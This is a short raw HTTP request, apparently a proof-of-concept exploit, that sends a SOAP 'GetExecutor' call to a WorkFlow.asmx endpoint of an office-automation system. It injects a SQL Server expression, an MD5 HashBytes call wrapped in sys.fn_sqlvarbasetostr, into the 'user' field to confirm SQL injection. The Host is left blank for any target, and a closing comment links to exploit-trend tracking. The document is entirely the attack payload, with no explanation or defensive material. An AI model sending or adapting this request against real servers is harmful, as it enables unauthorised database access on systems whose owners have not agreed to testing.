POST /oa/Common/WF/WorkFlow/WorkFlow.asmx HTTP/1.1
Host:
Content-Type: text/xml
Content-Length: 470
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko
Soapaction: "http://tempuri.org/GetExecutor"
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetExecutor xmlns="http://tempuri.org/">
<org>1</org>
<dept>1</dept>
<pos>1</pos>
<role>1</role>
<user>sys.fn_sqlvarbasetostr(HashBytes('MD5','vymsbmzs'))</user>
</GetExecutor>
</soap:Body>
</soap:Envelope>
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.